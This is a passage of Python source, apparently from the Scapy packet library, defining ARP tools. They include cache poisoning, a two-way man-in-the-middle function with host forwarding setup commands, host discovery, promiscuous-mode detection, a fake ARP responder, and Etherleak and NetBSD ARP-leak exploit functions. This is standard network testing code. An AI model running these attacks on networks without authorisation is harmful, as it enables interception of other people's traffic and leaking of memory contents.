conf.l2types.register_num2layer(DLT_LINUX_IRDA, CookedLinux)
conf.l2types.register(DLT_NULL, Loopback)
conf.l2types.register(DLT_LOOP, LoopbackOpenBSD)

conf.l3types.register(ETH_P_ARP, ARP)

831 

832 

833# Techniques 

834 

835 

@conf.commands.register
def arpcachepoison(
    target,  # type: Union[str, List[str]]
    addresses,  # type: Union[str, Tuple[str, str], List[Tuple[str, str]]]
    broadcast=False,  # type: bool
    count=None,  # type: Optional[int]
    interval=15,  # type: int
    **kwargs,  # type: Any
):
    # type: (...) -> None
    """Poison targets' ARP cache

    :param target: Can be an IP, subnet (string) or a list of IPs. This lists the IPs
                   or the subnet that will be poisoned.
    :param addresses: Can be either a string, a tuple or a list of tuples.
                      If it's a string, it's the IP to advertise to the victim,
                      with the local interface's MAC. If it's a tuple,
                      it's ("IP", "MAC"). If it's a list, it's [("IP", "MAC")].
                      "IP" can be a subnet of course.
    :param broadcast: Use broadcast ethernet
    :param count: number of times the packets are sent. If None (default),
                  they are re-sent forever until interrupted (Ctrl-C).
    :param interval: delay in seconds between two rounds
    :param kwargs: passed on to sendp()

    Examples for target "192.168.0.2"::

        >>> arpcachepoison("192.168.0.2", "192.168.0.1")
        >>> arpcachepoison("192.168.0.1/24", "192.168.0.1")
        >>> arpcachepoison(["192.168.0.2", "192.168.0.3"], "192.168.0.1")
        >>> arpcachepoison("192.168.0.2", ("192.168.0.1", get_if_hwaddr("virbr0")))
        >>> arpcachepoison("192.168.0.2", [("192.168.0.1", get_if_hwaddr("virbr0")),
        ...                                ("192.168.0.2", "aa:aa:aa:aa:aa:aa")])

    """
    # str_target is a single address used for routing / interface hints
    single = isinstance(target, str)
    targets = Net(target) if single else target  # type: Union[Net, List[str]]
    str_target = target if single else target[0]

    # Normalise ``addresses`` to a list of (IP, MAC) couples
    if isinstance(addresses, str):
        local_mac = get_if_hwaddr(conf.route.route(str_target)[0])
        couple_list = [(addresses, local_mac)]
    elif isinstance(addresses, tuple):
        couple_list = [addresses]
    else:
        couple_list = addresses

    eth_dst = "ff:ff:ff:ff:ff:ff" if broadcast else None
    p = []  # type: List[Packet]
    for spoofed_ip, spoofed_mac in couple_list:
        p.append(
            Ether(src=spoofed_mac, dst=eth_dst) /
            ARP(op="who-has", psrc=spoofed_ip, pdst=targets,
                hwsrc=spoofed_mac, hwdst="00:00:00:00:00:00")
        )

    if count is None:
        # No count: keep poisoning until the user interrupts
        try:
            while True:
                sendp(p, iface_hint=str_target, **kwargs)
                time.sleep(interval)
        except KeyboardInterrupt:
            pass
        return
    sendp(p, iface_hint=str_target, count=count, inter=interval, **kwargs)

894 

895 

@conf.commands.register
def arp_mitm(
    ip1,  # type: str
    ip2,  # type: str
    mac1=None,  # type: Optional[Union[str, List[str]]]
    mac2=None,  # type: Optional[Union[str, List[str]]]
    broadcast=False,  # type: bool
    target_mac=None,  # type: Optional[str]
    iface=None,  # type: Optional[_GlobInterfaceType]
    inter=3,  # type: int
):
    # type: (...) -> None
    r"""ARP MitM: poison 2 target's ARP cache

    :param ip1: IPv4 of the first machine
    :param ip2: IPv4 of the second machine
    :param mac1: MAC of the first machine (optional: will ARP otherwise)
    :param mac2: MAC of the second machine (optional: will ARP otherwise)
    :param broadcast: if True, will use broadcast mac for MitM by default
    :param target_mac: MAC of the attacker (optional: default to the interface's one)
    :param iface: the network interface. (optional: default, route for ip1)
    :param inter: passed to srploop() as ``inter``
    :raises OSError: if no MAC could be found for ip1 or ip2

    Example usage::

        $ sysctl net.ipv4.conf.virbr0.send_redirects=0  # virbr0 = interface
        $ sysctl net.ipv4.ip_forward=1
        $ sudo iptables -t mangle -A PREROUTING -j TTL --ttl-inc 1
        $ sudo scapy
        >>> arp_mitm("192.168.122.156", "192.168.122.17")

    Alternative usages:
        >>> arp_mitm("10.0.0.1", "10.1.1.0/21", iface="eth1")
        >>> arp_mitm("10.0.0.1", "10.1.1.2",
        ...          target_mac="aa:aa:aa:aa:aa:aa",
        ...          mac2="00:1e:eb:bf:c1:ab")

    .. warning::
        If using a subnet, this will first perform an arping, unless broadcast is on!

    Remember to change the sysctl settings back..
    """
    if not iface:
        iface = conf.route.route(ip1)[0]
    if not target_mac:
        target_mac = get_if_hwaddr(iface)

    def _tups(ip, mac):
        # type: (str, Optional[Union[str, List[str]]]) -> Iterable[Tuple[str, str]]
        # Build the list of (IP, MAC) couples for one side
        if mac is None:
            if broadcast:
                # ip can be a Net/list/etc and will be iterated upon while sending
                return [(ip, "ff:ff:ff:ff:ff:ff")]
            return [(x.query.pdst, x.answer.hwsrc)
                    for x in arping(ip, verbose=0, iface=iface)[0]]
        elif isinstance(mac, list):
            return [(ip, x) for x in mac]
        else:
            return [(ip, mac)]

    def _poison(victims, spoofed):
        # type: (Iterable[Tuple[str, str]], Iterable[Tuple[str, str]]) -> List[Packet]
        # who-has requests sent to every victim, announcing each spoofed IP
        # with the attacker's MAC as hardware source
        return [
            pkt
            for victim_ip, victim_mac in victims
            for spoofed_ip, _ in spoofed
            if spoofed_ip != victim_ip
            for pkt in
            Ether(dst=victim_mac, src=target_mac) /
            ARP(op="who-has", psrc=spoofed_ip, pdst=victim_ip,
                hwsrc=target_mac, hwdst="00:00:00:00:00:00")
        ]

    def _restore(victims, owners):
        # type: (Iterable[Tuple[str, str]], Iterable[Tuple[str, str]]) -> List[Packet]
        # Broadcast who-has requests announcing each owner's IP with its
        # real MAC again
        return [
            pkt
            for victim_ip, _ in victims
            for owner_ip, owner_mac in owners
            if owner_ip != victim_ip
            for pkt in
            Ether(dst="ff:ff:ff:ff:ff:ff", src=owner_mac) /
            ARP(op="who-has", psrc=owner_ip, pdst=victim_ip,
                hwsrc=owner_mac, hwdst="00:00:00:00:00:00")
        ]

    tup1 = _tups(ip1, mac1)
    if not tup1:
        raise OSError(f"Could not resolve {ip1}")
    tup2 = _tups(ip2, mac2)
    if not tup2:
        raise OSError(f"Could not resolve {ip2}")
    # One f-string only: combining it with "%" formatting would fail if an
    # interpolated value contained a "%".
    macs1 = [x[1] for x in tup1]
    macs2 = [x[1] for x in tup2]
    print(f"MITM on {iface}: {macs1} <--> {target_mac} <--> {macs2}")
    # We loop who-has requests
    srploop(
        _poison(tup1, tup2) + _poison(tup2, tup1),
        filter="arp and arp[7] = 2",
        inter=inter,
        iface=iface,
        timeout=0.5,
        verbose=1,
        store=0,
    )
    print("Restoring...")
    sendp(
        _restore(tup1, tup2) + _restore(tup2, tup1),
        iface=iface
    )

1018 

1019 

class ARPingResult(SndRcvList):
    """SndRcvList of ARP query/answer pairs, shown as a table by show()."""

    def __init__(self,
                 res=None,  # type: Optional[Union[_PacketList[QueryAnswer], List[QueryAnswer]]]  # noqa: E501
                 name="ARPing",  # type: str
                 stats=None  # type: Optional[List[Type[Packet]]]
                 ):
        SndRcvList.__init__(self, res, name, stats)

    def show(self, *args, **kwargs):
        # type: (*Any, **Any) -> None
        """
        Print the list of discovered MAC addresses.
        """
        rows = []  # type: List[Tuple[str | List[str], ...]]

        for _, reply in self.res:
            vendor = conf.manufdb._get_short_manuf(reply.src)
            if vendor == reply.src:
                # The lookup returned the address unchanged: no known vendor
                vendor = "unknown"
            rows.append((reply[Ether].src, vendor, reply[ARP].psrc))

        table = pretty_list(
            rows,
            [("src", "manuf", "psrc")],
            sortBy=2,
        )
        print(table)

1047 

1048 

@conf.commands.register
def arping(net: str,
           timeout: int = 2,
           cache: int = 0,
           verbose: Optional[int] = None,
           threaded: bool = True,
           **kargs: Any,
           ) -> Tuple[ARPingResult, PacketList]:
    """
    Send ARP who-has requests to determine which hosts are up::

        arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb])

    Set cache=True if you want arping to modify internal ARP-Cache

    :param net: target(s) placed in the ARP ``pdst`` field; when a list is
        given, its first element is used for route lookup
    :param timeout: forwarded to ``srp``
    :param cache: when truthy, store each answer's ``psrc -> hwsrc`` pair
        in ``_arp_cache``
    :param verbose: verbosity; defaults to ``conf.verb`` when None. A truthy
        value also prints the result table
    :param threaded: forwarded to ``srp``
    :param kargs: extra keyword arguments forwarded to ``srp``
        (``iface`` is also used here to pick the source addresses)
    :returns: ``(answers as ARPingResult, unanswered packets)``
    """
    verbose = conf.verb if verbose is None else verbose

    # With an explicit interface, its hardware address is used as source;
    # otherwise None is handed to the Ether/ARP constructors.
    src_mac = get_if_hwaddr(kargs["iface"]) if "iface" in kargs else None

    # A list of targets is routed according to its first entry.
    hint = net[0] if isinstance(net, list) else str(net)

    src_ip = conf.route.route(hint, verbose=False)[1]
    if src_ip == "0.0.0.0":
        # The route lookup gave no usable source address.
        if "iface" not in kargs:
            warning(
                "No route found for IPv4 destination %s. "
                "Using conf.iface. Please provide an 'iface' !" % hint)
            src_ip = get_if_addr(conf.iface)
            src_mac = get_if_hwaddr(conf.iface)
            kargs["iface"] = conf.iface
        else:
            src_ip = get_if_addr(kargs["iface"])

    probe = Ether(dst="ff:ff:ff:ff:ff:ff", src=src_mac) / ARP(
        pdst=net,
        psrc=src_ip,
        hwsrc=src_mac
    )
    answered, unanswered = srp(
        probe,
        verbose=verbose,
        filter="arp and arp[7] = 2",
        timeout=timeout,
        threaded=threaded,
        iface_hint=hint,
        **kargs,
    )
    result = ARPingResult(answered.res)

    if cache:
        for _, reply in result:
            _arp_cache[reply.psrc] = reply.hwsrc
    if verbose:
        result.show()
    return result, unanswered

1107 

1108 

@conf.commands.register
def is_promisc(ip, fake_bcast="ff:ff:00:00:00:00", **kargs):
    # type: (str, str, **Any) -> bool
    """Try to guess if target is in Promisc mode. The target is provided by its ip.

    An ARP who-has for ``ip`` is sent inside an Ethernet frame addressed to
    ``fake_bcast`` and a single answer is awaited for one second.

    :param ip: address placed in the ARP ``pdst`` field (also used as
        ``iface_hint``)
    :param fake_bcast: Ethernet destination of the probe
    :param kargs: extra keyword arguments forwarded to ``srp1``
    :returns: True when ``srp1`` returned an answer, False otherwise
    """  # noqa: E501
    probe = Ether(dst=fake_bcast) / ARP(op="who-has", pdst=ip)
    reply = srp1(
        probe,
        type=ETH_P_ARP,
        iface_hint=ip,
        timeout=1,
        verbose=0,
        **kargs
    )
    return reply is not None

1117 

1118 

@conf.commands.register
def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs):
    # type: (str, int, str, **Any) -> Tuple[ARPingResult, PacketList]
    """Send ARP who-has requests to determine which hosts are in promiscuous mode
    promiscping(net, iface=conf.iface)

    :param net: target(s) placed in the ARP ``pdst`` field (also used as
        ``iface_hint``)
    :param timeout: forwarded to ``srp``
    :param fake_bcast: Ethernet destination used for the probes
    :param kargs: extra keyword arguments forwarded to ``srp``
    :returns: ``(answers as ARPingResult named "PROMISCPing", unanswered)``;
        the answers table is always printed before returning
    """
    probe = Ether(dst=fake_bcast) / ARP(pdst=net)
    answered, unanswered = srp(
        probe,
        filter="arp and arp[7] = 2",
        timeout=timeout,
        iface_hint=net,
        **kargs
    )
    result = ARPingResult(answered.res, name="PROMISCPing")

    result.show()
    return result, unanswered

1130 

1131 

class ARP_am(AnsweringMachine[Packet]):
    """Fake ARP Relay Daemon (farpd)

    example:
    To respond to an ARP request for 192.168.1.100 replying on the
    ingress interface::

      farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05')

    To respond on a different interface add the interface parameter::

      farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05',iface='eth0')

    To respond on ANY arp request on an interface with mac address ARP_addr::

      farpd(ARP_addr='00:01:02:03:04:05',iface='eth1')

    To respond on ANY arp request with my mac addr on the given interface::

      farpd(iface='eth1')

    Optional Args::

     inter=<n>   Interval in seconds between ARP replies being sent

    """

    function_name = "farpd"
    filter = "arp"
    send_function = staticmethod(sendp)

    def parse_options(self, IP_addr=None, ARP_addr=None, from_ip=None):
        # type: (Optional[str], Optional[str], Optional[str]) -> None
        """
        Store the answering criteria.

        :param IP_addr: requested address(es) to answer for; a string is
            wrapped in ``Net``, anything else is stored as given
        :param ARP_addr: hardware address to answer with; None means it is
            looked up from the sending interface when replying
        :param from_ip: requester address(es) to answer to; a string is
            wrapped in ``Net``, anything else is stored as given
        """
        self.IP_addr = Net(IP_addr) if isinstance(IP_addr, str) else IP_addr  # type: Optional[Net]  # noqa: E501
        self.from_ip = Net(from_ip) if isinstance(from_ip, str) else from_ip  # type: Optional[Net]  # noqa: E501
        self.ARP_addr = ARP_addr

    def is_request(self, req):
        # type: (Packet) -> bool
        """
        Return True when ``req`` carries an ARP layer with op == 1 whose
        ``pdst``/``psrc`` match the configured ``IP_addr``/``from_ip``
        (a criterion set to None matches everything).
        """
        if not req.haslayer(ARP):
            return False
        arp = req[ARP]
        if arp.op != 1:
            return False
        if self.IP_addr is not None and arp.pdst not in self.IP_addr:
            return False
        return self.from_ip is None or arp.psrc in self.from_ip

    def make_reply(self, req):
        # type: (Packet) -> Packet
        """
        Build the ARP "is-at" answer to ``req`` and remember, in
        ``self.iff``, the interface it should leave from.
        """
        ether = req[Ether]
        arp = req[ARP]

        # An 'iface' send option wins; otherwise route towards the requester.
        if 'iface' in self.optsend:
            iff = cast(Union[NetworkInterface, str], self.optsend.get('iface'))
        else:
            iff, _, _ = conf.route.route(arp.psrc)
        self.iff = iff

        reply_mac = self.ARP_addr
        if reply_mac is None:
            # No address configured: use the interface's own one, falling
            # back to the all-zero address when it cannot be obtained.
            try:
                reply_mac = get_if_hwaddr(iff)
            except Exception:
                reply_mac = "00:00:00:00:00:00"

        eth_part = Ether(dst=ether.src, src=reply_mac)
        arp_part = ARP(
            op="is-at",
            hwsrc=reply_mac,
            psrc=arp.pdst,
            hwdst=arp.hwsrc,
            pdst=arp.psrc,
        )
        return eth_part / arp_part

    def send_reply(self, reply, send_function=None):
        # type: (Packet, Any) -> None
        """
        Send ``reply`` with the class ``send_function`` and the stored send
        options, adding ``iface=self.iff`` when no 'iface' option was given.
        """
        # NOTE(review): the ``send_function`` argument is accepted but not
        # used here; ``self.send_function`` is always called.
        extra = {} if 'iface' in self.optsend else {'iface': self.iff}
        self.send_function(reply, **extra, **self.optsend)

    def print_reply(self, req, reply):
        # type: (Packet, Packet) -> None
        """Print a one-line summary of the request, the reply and the interface."""  # noqa: E501
        fields = (req.summary(), reply.summary(), self.iff)
        print("%s ==> %s on %s" % fields)

1221 

1222 

@conf.commands.register
def etherleak(target, **kargs):
    # type: (str, **Any) -> Tuple[SndRcvList, PacketList]
    """Exploit Etherleak flaw

    Sends ``Ether() / ARP(pdst=target)`` through ``srp`` with an "arp"
    filter. For every answer that contains ``conf.padding_layer``, the
    ``prn`` callback returns the hex string of that layer's load.

    :param target: address(es) placed in the ARP ``pdst`` field
    :param kargs: extra keyword arguments forwarded to ``srp``
    :returns: whatever ``srp`` returns (answered, unanswered)
    """
    def _padding_hex(s_r):
        # type: (Any) -> Any
        # s_r is a (sent, received) pair; only the received packet matters.
        received = s_r[1]
        return (conf.padding_layer in received and
                hexstr(received[conf.padding_layer].load))

    probe = Ether() / ARP(pdst=target)
    return srp(probe, prn=_padding_hex, filter="arp", **kargs)

1230 

1231 

@conf.commands.register
def arpleak(target, plen=255, hwlen=255, **kargs):
    # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList]
    """Exploit ARP leak flaws, like NetBSD-SA2017-002.

    https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc

    :param target: address(es) placed in the ARP ``pdst`` field; one probe
        is built per generated packet
    :param plen: value written to the ARP ``plen`` field; addresses are
        given as raw bytes cut to this length unless it is 4
    :param hwlen: value written to the ARP ``hwlen`` field; the source
        hardware address is given as raw bytes cut to this length unless
        it is 6
    :param kargs: extra keyword arguments forwarded to ``srp``
    :returns: ``(answers, unanswered)`` accumulated over all interfaces
    """
    def _dump_extra(layer, fname, requested, normal):
        # type: (Packet, str, int, int) -> None
        # Print the bytes found past the normal size of field `fname`,
        # only when a longer-than-normal length was requested.
        raw = layer.get_field(fname).i2m(layer, getattr(layer, fname))
        if requested > normal and len(raw) > normal:
            print(fname)
            hexdump(raw[normal:])
            print()

    # We want explicit packets
    by_iface = {}  # type: Dict[str, List[Packet]]
    for probe in ARP(pdst=target):
        # We have to do some of Scapy's work since we mess with
        # important values
        out_if = conf.route.route(probe.pdst)[0]
        local_ip = get_if_addr(out_if)
        local_mac = get_if_hwaddr(out_if)
        probe.plen = plen
        probe.hwlen = hwlen
        if plen != 4:
            probe.psrc = inet_aton(local_ip)[:plen]
            probe.pdst = inet_aton(probe.pdst)[:plen]
        else:
            probe.psrc = local_ip
        if hwlen != 6:
            probe.hwsrc = mac2str(local_mac)[:hwlen]
        else:
            probe.hwsrc = local_mac
        by_iface.setdefault(out_if, []).append(
            Ether(src=local_mac, dst=ETHER_BROADCAST) / probe
        )

    # Probes are sent one interface at a time and the results merged.
    ans, unans = SndRcvList(), PacketList(name="Unanswered")
    for out_if, frames in by_iface.items():
        got, missed = srp(frames, iface=out_if, filter="arp", **kargs)
        ans += got
        unans += missed
        # Re-apply the list names after merging.
        ans.listname = "Results"
        unans.listname = "Unanswered"

    for _, reply in ans:
        if ARP not in reply:
            continue
        arp_layer = reply[ARP]
        _dump_extra(arp_layer, 'psrc', plen, 4)
        _dump_extra(arp_layer, 'hwsrc', hwlen, 6)
    return ans, unans